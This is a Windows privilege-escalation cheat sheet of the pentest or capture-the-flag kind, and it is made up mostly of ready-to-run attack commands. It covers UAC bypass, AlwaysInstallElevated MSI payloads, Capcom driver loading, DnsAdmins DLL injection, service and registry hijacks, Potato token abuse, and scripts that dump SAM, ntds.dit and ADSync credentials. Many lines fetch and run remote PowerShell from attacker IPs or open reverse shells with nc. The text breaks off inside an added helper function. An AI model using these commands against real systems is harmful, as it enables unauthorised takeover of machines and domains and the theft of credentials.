PrivilegeEsc Windows 👑

01. Common Tricks

01.1 UAC Bypass

  • DLL Hijacking UAC Bypass (SystemPropertiesAdvanced.exe)

## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if the binary auto-elevates
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If autoElevate is true, we are good to go. Only useful from a medium-integrity token of a user who is in Administrators.

## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack

## ------------------| Exploit
## The 32-bit binary looks for srrstr.dll along the user PATH, which includes the user-writable WindowsApps directory
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
### If you get an error saying "This operation requires an interactive window",
### the bypass needs a session with a desktop: use a C2 (e.g. GreatSCT/MSBuild to launch Meterpreter) and migrate, as below.

## ------------------| Use with an interactive shell
### Create the payload and gain a shell using the following method
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate into the user's explorer.exe (a process attached to the interactive desktop)
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe

01.2 If you have, are in, or can?

  • AlwaysInstallElevated enabled?

## ------------------| How to check (both hives)
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

## If the value "AlwaysInstallElevated" exists in BOTH keys
## with a REG_DWORD value of 0x1, the AlwaysInstallElevated policy is enabled:
## any MSI package a user installs runs with SYSTEM privileges.
## One key alone is not enough; Windows Installer ignores the policy unless both are set.

## ------------------| Exploit 
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi      
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi  

## Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation
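Added check, not part of the original notes: a PowerShell function that reads the policy value from both hives and only reports it as exploitable when both are 1, since a single hive set to 1 is the usual false positive. It assumes nothing beyond the two registry paths quoted above; run it as the low-privileged user whose HKCU you intend to abuse.

```powershell
# Added example (not from the original notes). AlwaysInstallElevated only takes effect
# when the DWORD is 1 in BOTH HKLM and HKCU; check both before building an MSI.
function Test-AlwaysInstallElevated {
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\$subKey"
        # Missing key or missing value both come back as $null (policy not set in that hive)
        $item = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Hive                  = $hive
            KeyExists             = Test-Path -Path $path
            AlwaysInstallElevated = if ($item) { $item.AlwaysInstallElevated } else { $null }
        }
    }
    $enabled = @($values | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2
    [pscustomobject]@{
        HKLM        = ($values | Where-Object Hive -eq 'HKLM').AlwaysInstallElevated
        HKCU        = ($values | Where-Object Hive -eq 'HKCU').AlwaysInstallElevated
        Exploitable = $enabled
        Next        = if ($enabled) { 'msiexec /quiet /qn /i <payload>.msi: the Installer service runs the package as SYSTEM' }
                      else { 'policy not effective: msiexec runs the package with your own token' }
    }
}

Test-AlwaysInstallElevated
```

If Exploitable is $false but one hive is set, nothing here is usable: the Windows Installer service checks the machine policy and the per-user policy together.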
  • Have SeBackupPrivilege and SeRestorePrivilege?

## ------------------| How to check (the privilege only needs to be listed; reg.exe, robocopy /B and diskshadow enable it themselves)
whoami /priv | findstr /i "SeBackupPrivilege SeRestorePrivilege"

## ------------------| Save the SYSTEM and SAM hives to the current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

#### On a domain controller, also grab the AD database ntds.dit. It is locked by lsass on a live DC, so take a shadow copy first:

## ------------------| Create diskshadow script on local 
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

## ------------------| Convert the script to Windows line endings (CRLF) and upload it
unix2dos script.txt

## ------------------| Use diskshadow to snapshot the C drive
diskshadow.exe /s script.txt
## The snapshot of the entire file system is now exposed as the E: drive
ls E:

## ------------------| Use robocopy in backup mode (/B, uses SeBackupPrivilege) to copy E:\Windows\ntds\ntds.dit
robocopy /B E:\Windows\ntds\ .\ ntds.dit
# Download SAM, SYSTEM and ntds.dit, then run secretsdump.py (see 02.4) to get the Administrator hash

## ------------------| Using wbadmin.exe
## wbadmin needs an SMB backup target formatted as NTFS/ReFS. On the attacker box, create an
## NTFS-formatted loop device, mount it and serve that directory over SMB (samba or impacket-smbserver):
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mkdir share && mount /dev/loop0 ./share

## On the target, back up ntds.dit to the share (wbadmin reads it through VSS, so the lock does not matter)
echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit
## The backup is stored as a VHDX; recover the file to a readable location, then grab SYSTEM with reg save as above
wbadmin get versions -backuptarget:\\10.10.14.22\share
wbadmin start recovery -version:<MM/DD/YYYY-HH:MM> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:c:\windows\temp -notrestoreacl -quiet
  • Have SeLoadDriverPrivilege?

## ------------------| Download and upload the following files to the machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe

## ------------------| Create payload and upload
msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe

## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # Required: this build of ExploitCapcom.exe launches exactly this path. Start your listener first
## Load the signed-but-vulnerable Capcom driver through a service key under HKCU (SeLoadDriverPrivilege allows this for HKCU keys)
.\EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\<USER>\Capcom.sys
## Abuse the driver's arbitrary kernel-code primitive to spawn the payload as SYSTEM
.\ExploitCapcom.exe
  • If the user is in the DnsAdmins group?

## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll

## ------------------| Create an SMB share on the local machine
impacket-smbserver share ./

## ------------------| Do this on the owned remote box (dnscmd must target the DNS server; 127.0.0.1 assumes you are on the DC)
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\share\h4rithd.dll
sc.exe stop dns
## Start a netcat listener, then restart the service so dns.exe loads the DLL as SYSTEM
sc.exe start dns
## Cleanup: the DNS service will not start properly while the value points at your DLL, so remove it afterwards
reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
  • If you have GenericAll on user jorden

## ------------------| Disable Kerberos pre-authentication for jorden (makes the account AS-REP roastable)
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true

## ------------------| Then request the AS-REP and crack it (hashcat -m 18200)
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass
  • If you have GenericWrite / SERVICE_CHANGE_CONFIG on a service (UsoSvc in this example)

## ------------------| Check the current configuration (note the original binpath so you can restore it)
sc.exe qc UsoSvc

## ------------------| If that succeeds, exploit [the space after binpath= and start= is required by sc's parser]
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""
sc.exe stop UsoSVC
sc.exe config UsoSVC start= auto
sc.exe start UsoSVC
## sc reports a timeout because cmd.exe never answers the SCM; the shell is spawned anyway. Restore the original binpath afterwards.
  • If you can run xp_dirtree (MSSQL)?

## Start Responder to capture the NetNTLMv2 authentication of the SQL Server service account
sudo responder -I tun0

## Execute (the UNC path must be a T-SQL string literal)
sqlcmd -Q "EXEC master..xp_dirtree '\\<YourIP>\test'"

## Crack the captured NetNTLMv2 hash (hashcat mode 5600)
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
  • If you are in the Azure Admins group (or otherwise have read access to the ADSync database)?

## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## Methodology (from the blog): read the key set and the encrypted AD connector configuration from the ADSync
## database, then use mcrypt.dll to decrypt the stored credentials of the on-prem sync account.
## A failure at LoadKeySet usually means the AD Connect build differs from the one the blog targets, not a permission problem.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
  • If you are a member of the Event Log Readers group

## This group can read the Security log remotely and locally; 4688 events carry full command lines (often including passwords) when command-line auditing is on
wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')

# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*  

# Find lockout events on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName     

# Process creation with command line (4688 "A new process has been created"; needs "Include command line in process creation events" enabled)
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap

## Check this out for windows event codes
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
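Added example, not part of the original notes: the same 4688 search done without the Get-WinEventData helper, pulling the EventData fields out of the event XML and keeping only command lines that look like they carry a credential (net use /user:, runas, schtasks, sqlcmd -P, psexec and so on). The regex is this example's own heuristic and will need tuning per environment; the field names (SubjectUserName, NewProcessName, CommandLine, ParentProcessName) are the ones the 4688 event defines.

```powershell
# Added example (not from the original notes). Event Log Readers can read the Security log;
# with command-line auditing enabled, 4688 events frequently leak passwords typed by admins
# and scheduled scripts. Pattern is a heuristic: tune it for the environment you are in.
function Find-CommandLineSecrets {
    param(
        [string]$ComputerName,                 # omit for the local machine
        [int]$MaxEvents = 5000,
        [string]$Pattern = '/user:|/pass|password|pwd=|-pw |-p |/p |runas|net\s+use|schtasks|sqlcmd|psexec'
    )
    $params = @{
        FilterHashtable = @{ LogName = 'Security'; Id = 4688 }
        MaxEvents       = $MaxEvents
        ErrorAction     = 'SilentlyContinue'
    }
    if ($ComputerName) { $params.ComputerName = $ComputerName }

    foreach ($e in Get-WinEvent @params) {
        # EventData is only exposed through the XML view; map every <Data Name=...> to its text
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $cmd = $data['CommandLine']
        if (-not $cmd -or $cmd -notmatch $Pattern) { continue }
        [pscustomobject]@{
            Time        = $e.TimeCreated
            Subject     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Process     = $data['NewProcessName']
            Parent      = $data['ParentProcessName']
            CommandLine = $cmd
        }
    }
}

# Usage: widest catch on a DC, where scheduled tasks and logon scripts run with admin credentials
Find-CommandLineSecrets -MaxEvents 20000 | Format-List
```

An empty result with no error usually means command-line auditing is off: the 4688 events exist but their CommandLine field is blank, which this function skips.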
  • If you are in the WSUS Administrators group? SharpWSUS

wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe

## WSUS only deploys Microsoft-signed binaries, hence PsExec as the payload carrier; create the update, approve it for the target, then wait for the client check-in
.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait 5-6 minutes for the client to check in
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>
  • If you are a member of the Administrators group, but still stuck (UAC-filtered, medium-integrity token)?

## List Administrators group members
net localgroup Administrators

## Use this simple method to bypass UAC: map the admin share over loopback. The SMB session is a network logon, which is not UAC-filtered for domain accounts
net use h: \\127.0.0.1\c$
h:
dir
  • If you are in LAPS_Readers (or any group granted read on ms-Mcs-AdmPwd)

## Needs the ActiveDirectory module (RSAT); the attribute only comes back for computers whose ACL lets you read it
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Export-Csv -Path C:\Windows\Temp\laps.csv -NoTypeInformation
  • Hijacking/Migrating into logged-on users' sessions

## ------------------| Check who is logged into the machine and which processes run under them
tasklist /v
query user

## ------------------| Get into a session
## Create the payload and a handler
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe
sudo msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Look for the target user's explorer.exe; it is the most stable process to migrate into. Copy its PID
migrate <PID>

01.3 Service / Registry Exploits

## ------------------| Enumeration [to trigger the change you also need SERVICE_START & SERVICE_STOP on the service, or a reboot]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"

## ------------------| Check permissions on the service binary
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Look for (F) full control or (M) modify granted to BUILTIN\Users, Everyone or Authenticated Users, e.g. BUILTIN\Users:(I)(F)

## ------------------| Check for particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>

## ------------------| Exploit
## Check current status (save the original BINARY_PATH_NAME from qc so you can restore it)
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service (stop it first if it is already running)
net start <service_name>
sc stop <service_name>
sc start <service_name>
## Set automatic start (payload runs at boot if you cannot start the service yourself)
sc config <service_name> start= auto
## Remove dependencies that would block the start
sc config <service_name> depend= ""

## ------------------| Restart via reboot (when you lack SERVICE_START/STOP; run from cmd)
wmic service where caption="<ServiceName>" get name, caption, state, startmode
## If StartMode is Auto the payload runs at boot
## Check if we have the reboot privilege (SeShutdownPrivilege; "Disabled" is fine, shutdown.exe enables it itself)
whoami /priv
shutdown /r /t 0
  • Insecure Service Executables

## ------------------| Check
### Is the executable writable by Everyone / Users?
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### Do we have SERVICE_START & SERVICE_STOP permissions?
.\accesschk.exe /accepteula -uwcqv user <service_name>

## ------------------| Exploit
## Back up the original executable, then replace it with shell.exe
## Start the service
net start <service_name>
sc stop <service_name>
sc start <service_name>
  • Unquoted Service Paths

## ------------------| Intro
## For an unquoted ImagePath containing spaces, CreateProcess treats each space as a possible end of the executable name and tries, in order:
C:\Program Files\One Folder\Two Folder\Executable.exe   <-- the configured (unquoted) path
C:\Program.exe                                           <-- tried first
C:\Program Files\One.exe                                 <-- then this
C:\Program Files\One Folder\Two.exe                      <-- then this
C:\Program Files\One Folder\Two Folder\Executable.exe    <-- finally the real one
## If you can write to any of those parent directories, drop a payload under the earlier name.

## ------------------| Check unquoted paths (auto-start, outside C:\Windows, path not wrapped in double quotes)
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

## ------------------| Check if we have
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
###  Write permission on the directory [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwdq "C:\Program Files\One Folder\"

## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name> 
sc STOP <service_name> 
sc START <service_name> 
  • Weak Registry Permissions

## ------------------| Verify [look for RW granted to NT AUTHORITY\INTERACTIVE, Users or Authenticated Users]
Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>

## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>

## ------------------| Check current values [ImagePath, and ObjectName == LocalSystem]
reg query HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>

## ------------------| Point ImagePath at the payload (reg.exe takes HKLM\..., not PowerShell's HKLM:\ drive form)
reg add HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName> /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f
net start <ServiceName>
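Added example, not part of the original notes: one read-only PowerShell triage pass over every service for the three weaknesses covered in 01.3 (a service binary the current user can overwrite, an unquoted ImagePath with a writable directory somewhere along it, and a writable service registry key). It evaluates DACLs against the caller's own token SIDs rather than writing test files, so it is safe on a box you do not own yet. Deny ACEs are deliberately ignored, so a hit is a lead to confirm with the accesschk/icacls commands above, not proof. The write-bit mask and the candidate-path derivation are this example's own; the registry location of the service keys is the real one.

```powershell
# Added example (not from the original notes): read-only triage of service misconfigurations
# against the current token. Confirm hits with accesschk/icacls before acting on them.

# WriteData (files) / SetValue (registry) = 0x2, plus GENERIC_WRITE and GENERIC_ALL
$WriteBits = 0x2 -bor 0x40000000 -bor 0x10000000

function Get-TokenSids {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Test-WritableAcl {
    # $true when an Allow ACE carrying write-class rights names a SID from $Sids.
    # Works for file system paths and for HKLM:\... registry paths alike.
    param([string]$Path, [string[]]$Sids)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.PropagationFlags -band 2) -ne 0) { continue }   # InheritOnly: not effective on this object
        try   { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                         # orphaned / unresolvable SID
        if ($Sids -notcontains $sid) { continue }
        $rights = if ($ace.PSObject.Properties['FileSystemRights']) { $ace.FileSystemRights.value__ }
                  else { $ace.RegistryRights.value__ }
        if (($rights -band $WriteBits) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    # For the unquoted  C:\Program Files\One Folder\Two Folder\Executable.exe  the SCM tries
    # C:\Program.exe, then C:\Program Files\One.exe, then C:\Program Files\One Folder\Two.exe.
    param([string]$ImagePath)
    if ($ImagePath -match '^"') { return @() }                      # quoted: not vulnerable
    if ($ImagePath -notmatch '^(.*?\.exe)') { return @() }
    $exe = $Matches[1]
    $out = @()
    $i = $exe.IndexOf(' ')
    while ($i -gt 0) {
        $out += $exe.Substring(0, $i) + '.exe'
        $i = $exe.IndexOf(' ', $i + 1)
    }
    return $out
}

function Find-ServiceWeakness {
    $sids = Get-TokenSids
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $findings = @()

        # 1. the executable itself (quoted or not) writable by us
        $binary = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
                  elseif ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] }
        if ($binary -and (Test-Path -LiteralPath $binary) -and (Test-WritableAcl $binary $sids)) {
            $findings += "binary writable: $binary"
        }

        # 2. a directory we can drop a file into along an unquoted path
        foreach ($c in Get-UnquotedPathCandidates $svc.PathName) {
            $dir = Split-Path -Path $c -Parent
            if ((Test-Path -LiteralPath $dir) -and (Test-WritableAcl $dir $sids)) {
                $findings += "unquoted path, can drop: $c"
            }
        }

        # 3. the service's own registry key (ImagePath lives here) writable by us
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if (Test-WritableAcl $key $sids) { $findings += "registry key writable: $key" }

        if ($findings) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunAs     = $svc.StartName
                StartMode = $svc.StartMode
                State     = $svc.State
                Findings  = $findings -join '; '
            }
        }
    }
}

Find-ServiceWeakness | Format-List
```

RunAs and StartMode tell you whether a hit is worth it: a writable binary for a service running as a low-privileged virtual account gains nothing, and an Auto service you cannot start or stop still pays off after a reboot.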

02. Tools

02.1 PowerUp

## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')" 

## ------------------| Run all checks first, then the individual ones
Invoke-AllChecks
Get-CurrentUserTokenGroupSid
Get-RegistryAutoLogon

## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'

02.2 PowerUpSQL

# Download
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1

# Upload 
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')

# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
# $Targets holds the instances you can connect to, e.g.
$Targets = Get-SQLInstanceLocal | Get-SQLConnectionTest | Where-Object {$_.Status -eq 'Accessible'}
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20     

02.3 Seatbelt

# Run ALL enumeration checks
Seatbelt.exe -group=all

02.4 SecretsDump

## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local

## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161

# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- NT hash of an empty password
# aad3b435b51404eeaad3b435b51404ee <-- empty LM hash (LM hashes are no longer stored)

## ------------------| NTDS taken from a DC
## Copy the ntds file. On a live DC it is locked by lsass, so copy it from a shadow copy (see diskshadow in 01.2); this works on a mounted snapshot or offline disk
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Save the SAM and SYSTEM hives too, then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local

## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1

03. Common Exploits

03.0 JuicyPotatoNG (New)

## ------------------| Verify the vulnerability
whoami /priv | findstr /i "SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege"
# If either privilege is listed we are good, even when it shows as Disabled: the tool enables it itself 👌👌👌

## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip                                                             
unzip JuicyPotatoNG.zip

## ------------------| After uploading it to the victim, create a bat file that runs the encoded payload
echo powershell -EncodedCommand SQBFAFgAKABOA.....ApAA== > C:\programdata\shell.bat
type C:\programdata\shell.bat

## ------------------| Run (-t * tries CreateProcessWithTokenW, then CreateProcessAsUser)
.\JuicyPotatoNG.exe -t * -p C:\programdata\shell.bat

03.1 Juicy Potato (Abusing the golden privileges)

## ------------------| Verify the vulnerability (same check as 03.0)
whoami /priv | findstr /i "SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege"
# If either privilege is listed (Enabled or Disabled) we are good 👌👌👌

## ------------------| Create the .bat script that JuicyPotato will launch
## Shell through netcat
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through PowerShell
echo cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1') > sh3ll.bat

## ------------------| Test the default (BITS) CLSID: -z only prints the token's user without launching anything; JuicyPotato's test_clsid.bat iterates the full list for your OS
.\JuicyPotato.exe -z -l 100

## ------------------| Execute 
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337  
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337  

## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both  
-p <program>: program to launch
-l <port>: COM server listen port

# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
03.2 RoguePotato

## ------------------| Run chisel so the victim's port 9999 (RoguePotato's RPC listener) is reachable from the attacker box as 127.0.0.1:9999
chisel server --reverse --port 1337 ## on the attacker box
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999 ## on the victim

## ------------------| Run socat so the victim's OXID resolver callback to <MyIP>:135 is forwarded into the RoguePotato listener
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## on the attacker box

## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or 
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999

03.3 MultiPotato

## ------------------| Download
### Bit 64
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe 
### Bit 32
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe     

## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser

## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

03.4 PrintSpoofer

# !!! The Spooler service must be running, and the prebuilt binary needs the Microsoft Visual C++ Redistributable installed

.\PrintSpoofer.exe -i -c "C:\<PATH>\shell.exe"
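Added example, not part of the original notes, covering the Potato family in 03.0 to 03.4: "whoami /priv | findstr Enabled" misses a privilege that is present but Disabled, and all of these tools call AdjustTokenPrivileges themselves, so presence is what matters. The function below parses whoami's CSV output, reads the build number and the Spooler state, and lists which tools from this section still apply. The build cut-off it uses is the documented one (JuicyPotato's BITS/OXID trick stops working at build 17763, Windows 10 1809 / Server 2019); the option strings are just reminders of the invocations above.

```powershell
# Added example (not from the original notes). Decide which Potato variant fits this host.
function Select-PotatoVariant {
    # whoami /priv /fo csv gives the columns "Privilege Name", Description, State
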